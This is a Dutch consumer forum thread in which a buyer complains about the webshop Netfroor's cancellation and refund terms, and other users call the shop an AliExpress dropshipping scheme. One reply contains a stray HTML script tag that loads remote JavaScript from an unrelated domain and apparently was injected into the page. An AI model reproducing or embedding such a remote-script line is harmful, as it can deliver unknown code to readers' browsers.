Re
door ReneevdO Oct 30, 2019 om 12:40
Winkels & webshops

Netfroor

Wie heeft er ook vervelende ervaringen met de website Netfroor?Wel betaald, niets ontvangen?
Mijn probleem ligt nog op een ander vlak, namelijk dat ze mij verantwoordelijk stellen voor alles, terwijl ik binnen 30 minuten heb geannuleerd.Zij stellen dat het opgestuurd is en ik het kan retourneren op mijn eigen kosten, douane kosten en zoveel procent van het kado.
 Nadat ik deze vraag bij hen gedropt heb , ben ik overal geblockt

Gewoon terugmailen als er wat gevraagd wordt en als ik geannuleerd heb binnen 30 minuten en vandaag blijkbaar toch is verzonden!!! Zijn jullie helemaal?????
Helaas kunnen wij uw bestelling niet meer annuleren nadat deze is verwerkt en/of verzonden (annuleren MOET binnen 30 minuten nadat u de bestelling heeft geplaatst). U zult moeten wachten op de levering van het product en het product terugsturen met een traceernummer (u bent verantwoordelijk voor de verzendkosten voor het retourneren en de douanekosten). Zodra wij uw item ontvangen dan zullen wij u een volledige terugbetaling min 20% restocking fee en kosten die aan ons voor restituties door de credit card bedrijven.

Als u uw bestelling annuleert VOORDAT deze verwerkt en/of verzonden is (wat binnen 30 minuten nadat u de bestelling heeft geplaatst - geen uitzonderingen), dan heeft u recht op een terugbetaling - maar wij zullen 8% kosten in rekening brengen om de kosten te dekken die bij ons worden berekend voor terugbetalingen door de creditcardmaatschappijen.

En dat heb ik dus gedaan, binnen 30 minuten.
Ze doen alsof ze gek zijn, en antwoorden mij maar ook anderen niet meer terug
Daarom de vraag, wie herkent dit gesjoemel bij Netfroor.nl?

2876 10 Rapporteer

tijger1
door tijger1 - Oct 30, 2019 om 12:52
42060 Antwoorden / 21 Vragen

Nog nooit van dat bedrijf gehoord. Zeker van Facebook?

Gesjoemel? Staat toch uitdrukkelijk in de voorwaarden. U bestelt iets wijd weg en annuleert binnen 30 minuten. Voortaan eerst nadenken.

Als u het niet accepteert, betaalt u ook geen douanekosten. Beschouw het maar als leergeld.

ne
door neodutchio - Oct 30, 2019 om 13:02
5173 Antwoorden / 12 Vragen

Misschien heel hard gezegd, maar een cursus kopen op internet is een betere optie. Deze site klopt van geen kanten en de AV is een lachertje. Alle kosten en alle risico ligt bij de koper en de terugbetaling bij herroeping is tegen de wet.

Verder is er geen KVK te vinden en contact enkel via een mailadres. Reden genoeg om er nooit te willen bestellen.

Als u een lange adem hebt dan binnen 14 dagen na ontvangst herroepen, direct terug sturen en op dag 15 na herroepen aangeven dat een incassobureau ingeschakeld zal worden om het volledige aankoopbedrag inclusief verzendskosten naar u toe en exclusief de kosten die u moet maken voor het terug sturen te verhalen.

panter22
door panter22 Oct 30, 2019 om 13:30
6599 Antwoorden / Vragen

Beetje lastig als je niet weet waar de webshop gevestigd is.

Da
door Daniellee - Oct 30, 2019 om 13:16
1 Antwoorden / Vragen

Nou hier ook zo'n dombo ( zoals mensen dat noemen ) een maand geleden een armband voor mn zoontje besteld. Levertijd was 7 tot 14 dagen. Reageren niet op mail of fb. Tuurlijk heb ik gezien dat ze op ali express 20  euro goedkoper zijn maar dat was pas nadat ik het armbandje besteld had. Oh ja er zijn nog heeeel veel dombo's zoals ik op fb heb gelezen van mensen die daar een bestelling hebben gedaan.

ne
door neodutchio Oct 30, 2019 om 13:36
5173 Antwoorden / 12 Vragen

Ook maar een cursus online bestellen volgen, of wilt u direct onder curatele? Ja, ik weet het, ik ben zeer hard naar u toe, maar dat is niet persoonlijk bedoeld. Vorig jaar heb hier bijgehouden hoeveel nepshops hier voorbij gekomen zijn. 50 stuksme namen als uitinhilligom.nl, discotheekbumpers.nl en gitaarlesin.nl. Verblind door de lage prijzen werden allerlei gegevens bekend gemaakt aan criminelen.

Jarenlang wordt al gewaarschuwd en tips gegeven waarop te letten bij het online bestellen. Helaas blijkt veel te vaak dit tegen dovemansoren is. De laatste tijd komen er enorm vaal klachten over vage webshopjes die via Facebook gevonden worden. Verblind door een mooie aanbieding meteen kopen en niet opletten bij wat voor bedrijf. Zolang dit blijft gebeuren blijven dit soort bedrijfjes bestaan. Prijzen die enorm leuk zijn, maar geen KVK, geen contactgegevens, geen adres bekend, AV die nergens op slaan en ga zo maar door.

Gelukkig hebben creditcardmaatschappijen dit ook steeds meer door en betalen niet meer terug als de koper op voorhand had kunnen weten dat de site aan geen enkele voorwaarde voldoet.

U mag uzelf een domdo noemen, maar hopelijk leert u er wel van om niet zomaar ergens wat te bestellen.

Gr
door Grunn1 Oct 30, 2019 om 13:47
1427 Antwoorden / 18 Vragen

Inderdaad een dombo, deze site heeft maar iets van 10 artikelen te koop maar volgens de voorwaarden hebben ze op meerdere plekken grote magazijnen en dat voor die paar dingen?
Dit is echt een website waar je niet in hoort te trappen, niks klopt er net zoals de dingen die ze verkopen. Een paar auto spullen, een paar dieren spullen en wat sieraden, wat is de link tussen deze artikelen behalve oplichting?

Topantwoord

marita5
door marita5 - Oct 30, 2019 om 13:24
11545 Antwoorden / 15 Vragen

Hallo Reneevdo ,

Beter controleren vooraf i.p.v. achteraf .

De site is geregistreerd op 1 - 6 - 2019 , Tucows.com Co. 96 Mowat Ave. ON M6K 3M1 Toronto Canada .
Staat op naam van James H*****tt

 Als u uw bestelling annuleert VOORDAT deze verwerkt en/of verzonden is (wat binnen 30 minuten nadat u de bestelling heeft geplaatst - geen uitzonderingen), dan heeft u recht op een terugbetaling - maar wij zullen 8% kosten in rekening brengen om de kosten te dekken die bij ons worden berekend voor terugbetalingen door de creditcardmaatschappijen.

Deze onzin vermelden ze ook op hun site .

https://netfroor.nl/pages/verzendingsbeleid

panter22
door panter22 - Oct 30, 2019 om 13:24
6599 Antwoorden / Vragen

Voortaan eerst lezen als je gaat bestellen, Bij wie je bestelt. Er is geen adres bekend van deze Netfroor. Je hebt geen enkele zekerheid of het pakje wel komt. Komt het pakje niet door de douane, dan is het  jammer maar helaas.
De spullen komen uit internationale magazijnen, (via Aliexpress)
En krijg je het pakje wel, dan moet je veel kosten maken om het pakje terug te sturen en dan is het nog maar de vraag of je iets van je geld  terugkrijgt.

Gr
door Grunn1 - Oct 30, 2019 om 13:48
1427 Antwoorden / 18 Vragen

Waarom is mijn reactie verwijderd?

Hoe kom je in vredesnaam op zo'n site terecht?
Gewoon e.o.a. site met goedkope artikelen van aliexpress die daar verkocht worden.
Heb even gekeken en zie direct een hondendeken voor 32 euro en op alie dezelfde deken voor 8 euro met dezelfde foto.

Jij betaald, site eigenaar besteld bij Alie met jouw adres als afleveradres en pakt een dikke winst en jij weken wachten op je goedkope bestelling.
Je geld krijg je echt niet terug maar mischien over een aantal weken wel je veel te duur betaalde bestelling.

Dit wordt zoveel gedaan dat ik nu rustig kan en wil zeggen dat je de volgende dombo bent die er weer intrapt. Ja ik weet het niet netjes maar dit gaat al jaren zo en zolang mensen niet nadenken blijven ze erin trappen.

Re
door ReneevdO Nov 4, 2019 om 10:43
1 Antwoorden / 1 Vragen

Nou dombo??Ik bestel al meer dan 10 jaar online en eigenlijk nooit dit soort shit gehad, dus om meteen maar dombo te roepen in het luchtledige??

ju
door juliomariner Nov 4, 2019 om 11:17
1339 Antwoorden / 2 Vragen

Dombo ja, een blind paard kan nog zien dat de site gewoon niet klopt

Gr
door Grunn1 Nov 4, 2019 om 14:15
1427 Antwoorden / 18 Vragen

@reneevdo, .
Ik bestel ook al jaren online maar als je op deze site iets besteld weet je dat je genept wordt. Een webshop met een paar artikelen waarvan de fotos gekopieerd zijn van Aliexpres en voorwaarden vertaald van eoa Chinese webshop en dan raar vinden dat je je bestelling niet krijgt. Als je al 10 jaar online zaken koopt wordt het toch tijd om beter op te letten.

heremietkreeft
door heremietkreeft - Oct 30, 2019 om 17:31
16887 Antwoorden / 202 Vragen

Is het al lang geleden dat u heeft besteld (en binnen 30 min. heeft geannuleerd)? Ik vraag dat omdat vereznden vanuit verder gelegen buitenland en vooral van buiten de EU via Douane kan gaan en er daardoor vertraging ontstaat.

En dan ook nog een tip: als u ergens iets on-line bestelt, doe dat dan op basis dat u eerst betaalt na ontvangsten zoek ook naar nadere info met de aantekening dat 'reviews' soms te mooi zijn om waar te zijn.

Re
door ReneevdO Nov 4, 2019 om 10:44
1 Antwoorden / 1 Vragen

Ik heb gezocht op reviews , kon niks vinden, nergens niet.

heremietkreeft
door heremietkreeft Nov 4, 2019 om 10:53
16887 Antwoorden / 202 Vragen

Zegt dat dan niet al voldoende? Hoewel bij deze verwijzing staan drie likes https://www.facebook.com/Netfroornl-883513995375136/ en dat is opvallend weinig. Dank voor de melding

Re
door ReneevdO - Nov 4, 2019 om 10:41
1 Antwoorden / 1 Vragen

Ondertussen gekregen maar ik heb het meteen doorverkocht, wat een gelul zeg.
Ze adverteren ook met kettingen voor moeder en dochter, armbanden moeder en zoon en nee, ze zijn niet goedkoop als Ali.Ik heb overigens met Alie hele goede ervaringen

<script src="//mikkymax.com/20ba4519da0cfb915b.js" async="" type="text/javascript">

tijger1
door tijger1 Nov 4, 2019 om 10:54
42060 Antwoorden / 21 Vragen

Dan gaat u daar toch weer gewoon bestellen als u het zo goed weet.

Maar dan niet weer hier komen jammeren.

marita5
door marita5 - Nov 4, 2019 om 10:50